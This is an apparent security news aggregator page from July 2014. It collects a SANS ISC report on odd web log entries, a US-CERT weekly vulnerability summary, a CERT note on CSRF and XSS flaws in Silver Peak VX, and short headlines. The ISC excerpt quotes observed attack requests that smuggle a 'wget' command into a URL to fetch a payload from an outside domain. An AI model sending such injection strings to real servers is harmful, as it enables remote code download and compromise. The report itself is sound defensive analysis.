Twitter
LinkedIn
RSS

Archive for the ‘Research & Alerts’ Category


Interesting HTTP User Agent "chroot-apach0day", (Mon, Jul 28th)

Our reader Robin submitted the following detect: I’ve got a site that was scanned this morning by a tool that left these entries in the logs: [HTTP_USER_AGENT] => chroot-apach0day [HTTP_REFERRER] => /xA/x0a/x05 [REQUEST_URI] => /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget http://proxypipe.com/apach0day   The URL that appears to be retrieved does not exist, even though the domain does. In our own web logs, we have seen a couple of similar requests: 162.253.66.77 – - [28/Jul/2014:05:07:15 +0000] “GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-” 162.253.66.77 – - [28/Jul/2014:18:48:36 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day” “-” 162.253.66.77 – - [28/Jul/2014:20:04:07 +0000] “GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget%20proxypipe.com/apach0day; HTTP/1.0″ 301 178 “-” “chroot-apach0day-HIDDEN BINDSHELL-ESTAB” “-” If anybody has any ideas what tool causes these entries, please let us know. Right now, it doesn’t look like this is indeed an “Apache 0 Day”  There are a couple other security related sites where users point out this user agent string, with little insight as to what causes the activity or what the goal is.

Read More...

Probably not a good idea to read this if you are a #CISO

6 retweets 6 favorites

Read More...

SB14-209: Vulnerability Summary for the Week of July 21, 2014

Original release date: July 28, 2014 The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT)

Read More...

Don't believe the hype: here are 4 common #infosec oversights

6 retweets 1 favorites

Read More...

KPMG says this chaos is making it easier, a LOT easier, for our enemies to #hack into our systems. Sad but true.

2 retweets 1 favorites

Read More...

Wikipedia ban edits from US Congress IPS after anti-Cuban 'tweaks' (you need to get up early to change history)

5 retweets 3 favorites

Read More...

Indian #hacker arrested in Chennai (Tamil Nadu) for breaking into Microsoft Website, stealing Product Keys

6 retweets 6 favorites

Read More...

VU#867980: Silver Peak VX is vulnerable to cross-site request forgery and cross-site scripting

Vulnerability Note VU#867980 Silver Peak VX is vulnerable to cross-site request forgery and cross-site scripting Original Release date: 28 Jul 2014 | Last revised: 28 Jul 2014 Overview Silver Peak VX version 6.2.2.0_47968 is vulnerable to cross-site request forgery and cross-site scripting. Description CWE-352 : Cross-Site Request Forgery (CSRF) – CVE-2014-2974 Silver Peak VX version 6.2.2.0_47968 contains a cross-site request forgery vulnerability in  /php/user_account.php that allows an unauthenticated user to create a new administrator account. CWE-79 : Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) – CVE-2014-2975 Silver Peak VX version 6.2.2.0_47968 also contains a reflected cross-site scripting vulnerability in /php/user_account.php that can allow an attacker to inject arbitrary HTML content (including scripts) via the vulnerable query string parameter user_id

Read More...

Almost 1 in 10 Android apps are now malware (and Asia has highest infection rate, then France and Russia)

21 retweets 3 favorites

Read More...

ISC StormCast for Monday, July 28th 2014 http://isc.sans.edu/podcastdetail.html?id=4079, (Mon, Jul 28th)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Read More...